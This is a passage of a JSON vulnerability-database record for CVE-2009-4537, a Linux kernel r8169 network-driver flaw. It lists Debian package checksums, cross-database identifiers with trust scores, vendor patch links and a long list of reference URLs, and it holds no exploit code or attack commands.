 110370 d746af2e449aaf644370d7b88a03cf2d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum: 14631258 b056f4f2245e4e2da6ef8e7549224226\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum: 14611896 ad3108a56bbacf863b4f18521275887c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum:   800838 114ac1590a19b405fcacfb06ee36e55a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum:  3820700 fff1d7baf26f32217a8100ca14875708\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum:   110352 02deff17df2e96a0ed208d786bdf9315\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum:  3785870 518b0d1f9d0d13adce8d6707726031ab\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum:   302894 c9354f7c9769be34b6356e0d042a294e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum:   304918 228d8163856c2e8e261b0fd086475d68\n\n  These files will probably be moved into the stable distribution on\n  its next update",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-4537"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001005"
      },
      {
        "db": "BID",
        "id": "37521"
      },
      {
        "db": "VULHUB",
        "id": "VHN-41983"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4537"
      },
      {
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "db": "PACKETSTORM",
        "id": "90264"
      },
      {
        "db": "PACKETSTORM",
        "id": "78056"
      },
      {
        "db": "PACKETSTORM",
        "id": "90307"
      },
      {
        "db": "PACKETSTORM",
        "id": "89939"
      }
    ],
    "trust": 2.52
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-41983",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-41983"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2009-4537",
        "trust": 3.3
      },
      {
        "db": "BID",
        "id": "37521",
        "trust": 2.9
      },
      {
        "db": "SECUNIA",
        "id": "38031",
        "trust": 2.6
      },
      {
        "db": "SECTRACK",
        "id": "1023419",
        "trust": 2.5
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2009/12/31/1",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2009/12/29/2",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2009/12/28/1",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "38610",
        "trust": 1.2
      },
      {
        "db": "SECUNIA",
        "id": "39830",
        "trust": 1.2
      },
      {
        "db": "SECUNIA",
        "id": "39742",
        "trust": 1.2
      },
      {
        "db": "SECUNIA",
        "id": "40645",
        "trust": 1.2
      },
      {
        "db": "VUPEN",
        "id": "ADV-2010-1857",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "35265",
        "trust": 0.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001005",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-061",
        "trust": 0.7
      },
      {
        "db": "MLIST",
        "id": "[OSS-SECURITY] 20091229 RE: CVE REQUESTS - KERNEL SECURITY REGRESSIONS FOR CVE-2009-1385/AND -1389",
        "trust": 0.6
      },
      {
        "db": "MLIST",
        "id": "[OSS-SECURITY] 20091228 CVE REQUESTS - KERNEL SECURITY REGRESSIONS FOR CVE-2009-1385/AND -1389",
        "trust": 0.6
      },
      {
        "db": "MLIST",
        "id": "[OSS-SECURITY] 20091231 RE: CVE REQUESTS - KERNEL SECURITY REGRESSIONS FOR CVE-2009-1385/AND -1389",
        "trust": 0.6
      },
      {
        "db": "MLIST",
        "id": "[LINUX-NETDEV] 20091228 [PATCH RFC] R8169: STRAIGHTEN OUT OVERLENGTH FRAME DETECTION",
        "trust": 0.6
      },
      {
        "db": "NSFOCUS",
        "id": "14331",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2010:0095",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2010:0019",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2010:0020",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2010:0041",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "89939",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-41983",
        "trust": 0.1
      },
      {
        "db": "VUPEN",
        "id": "2010/1857",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4537",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "90046",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "90264",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "78056",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "90307",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-41983"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4537"
      },
      {
        "db": "BID",
        "id": "37521"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001005"
      },
      {
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "db": "PACKETSTORM",
        "id": "90264"
      },
      {
        "db": "PACKETSTORM",
        "id": "78056"
      },
      {
        "db": "PACKETSTORM",
        "id": "90307"
      },
      {
        "db": "PACKETSTORM",
        "id": "89939"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-061"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4537"
      }
    ]
  },
  "id": "VAR-200906-0593",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-41983"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T20:12:37.118000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel-2.6.18-128.15.AXS3",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=1023"
      },
      {
        "title": "kernel-2.6.18-128.14.AXS3",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=1005"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "1992",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1992"
      },
      {
        "title": "RHSA-2010:0019",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0019.html"
      },
      {
        "title": "RHSA-2010:0020",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0020.html"
      },
      {
        "title": "RHSA-2010:0053",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0053.html"
      },
      {
        "title": "RHSA-2010:0079",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0079.html"
      },
      {
        "title": "RHSA-2010:0111",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0111.html"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100020 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100111 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100053 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100019 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100079 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100076 - security advisory"
      },
      {
        "title": "Debian Security Advisories: DSA-2053-1 linux-2.6 -- privilege escalation/denial of service/information leak",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=9640efc147e03b7d885b85adb8146ce6"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-source-2.6.15 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-947-1"
      },
      {
        "title": "Ubuntu Security Notice: linux regression",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-947-2"
      },
      {
        "title": "VMware Security Advisories: ESXi utilities and ESX Service Console third party updates",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=9ca0d654a28a118d1f99d0ae3b1753e8"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2009-4537"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001005"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-41983"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001005"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4537"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.7,
        "url": "http://www.securityfocus.com/bid/37521"
      },
      {
        "trust": 2.6,
        "url": "http://securitytracker.com/id?1023419"
      },
      {
        "trust": 2.6,
        "url": "http://secunia.com/advisories/38031"
      },
      {
        "trust": 2.1,
        "url": "http://blog.c22.cc/2009/12/27/26c3-cat-procsysnetipv4fuckups/"
      },
      {
        "trust": 2.0,
        "url": "http://marc.info/?t=126202986900002\u0026r=1\u0026w=2"
      },
      {
        "trust": 1.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=550907"
      },
      {
        "trust": 1.8,
        "url": "http://events.ccc.de/congress/2009/fahrplan/events/3596.en.html"
      },
      {
        "trust": 1.8,
        "url": "http://twitter.com/dakami/statuses/7104238406"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2009/12/28/1"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2009/12/29/2"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2009/12/31/1"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0019.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0020.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0041.html"
      },
      {
        "trust": 1.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0095.html"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=linux-netdev\u0026m=126202972828626\u0026w=2"
      },
      {
        "trust": 1.2,
        "url": "http://www.debian.org/security/2010/dsa-2053"
      },
      {
        "trust": 1.2,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-february/035159.html"
      },
      {
        "trust": 1.2,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a7443"
      },
      {
        "trust": 1.2,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9439"
      },
      {
        "trust": 1.2,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0053.html"
      },
      {
        "trust": 1.2,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0111.html"
      },
      {
        "trust": 1.2,
        "url": "http://secunia.com/advisories/38610"
      },
      {
        "trust": 1.2,
        "url": "http://secunia.com/advisories/39742"
      },
      {
        "trust": 1.2,
        "url": "http://secunia.com/advisories/39830"
      },
      {
        "trust": 1.2,
        "url": "http://secunia.com/advisories/40645"
      },
      {
        "trust": 1.2,
        "url": "http://www.novell.com/linux/security/advisories/2010_23_kernel.html"
      },
      {
        "trust": 1.2,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-07/msg00006.html"
      },
      {
        "trust": 1.2,
        "url": "http://www.vupen.com/english/advisories/2010/1857"
      },
      {
        "trust": 1.2,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/55647"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4537"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-4537"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/35265"
      },
      {
        "trust": 0.6,
        "url": "http://support.avaya.com/css/p8/documents/100072895"
      },
      {
        "trust": 0.6,
        "url": "http://www.nsfocus.net/vulndb/14331"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4537"
      },
      {
        "trust": 0.3,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=126fa4b9ca5d9d7cb7d46f779ad3bd3631ca387c"
      },
      {
        "trust": 0.3,
        "url": "http://events.ccc.de/congress/2009/fahrplan//events/3596.en.html"
      },
      {
        "trust": 0.3,
        "url": "http://events.ccc.de/congress/2009/fahrplan//attachments/1483_26c3_ipv4_fuckups.pdf"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.32.12"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=fdd7b4c3302c93f6833e338903ea77245eb510b4"
      },
      {
        "trust": 0.3,
        "url": "http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.32.y.git;a=commit;h=899854b6266b24ed162e363f86006c24e82b2885"
      },
      {
        "trust": 0.3,
        "url": "http://permalink.gmane.org/gmane.comp.security.oss.general/2459"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2010-0111.html"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1088"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1087"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1162"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0727"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1083"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1084"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1086"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0008"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0437"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32.orig.tar.gz"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0741"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0298"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0419"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1085"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4271"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0306"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1148"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1146"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?t=126202986900002\u0026amp;r=1\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=linux-netdev\u0026amp;m=126202972828626\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/20.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2010:0020"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/947-1/"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/./dsa-2053"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1386"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3547"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3286"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3080"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4567"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0001"
      },
      {
        "trust": 0.1,
        "url": "http://bit.ly/aqtcqn"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4567"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2908"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1013127"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1377"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4536"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2409"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4536"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3620"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3228"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4021"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1387"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0427"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0426"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1055"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3621"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2006-6304"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3939"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4020"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3736"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2695"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3556"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1378"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4538"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3621"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0097"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/security_response.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0290"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3547"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3286"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3612"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3613"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4138"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4272"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0382"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1384"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2695"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4355"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4141"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2908"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3613"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0590"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4538"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3620"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3080"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3726"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-6304"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2910"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3556"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3612"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1379"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4212"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3889"
      },
      {
        "trust": 0.1,
        "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2910"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos_vi.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3563"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3228"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3726"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_powerpc.deb"
      },
      {
        "trust": 0.1,
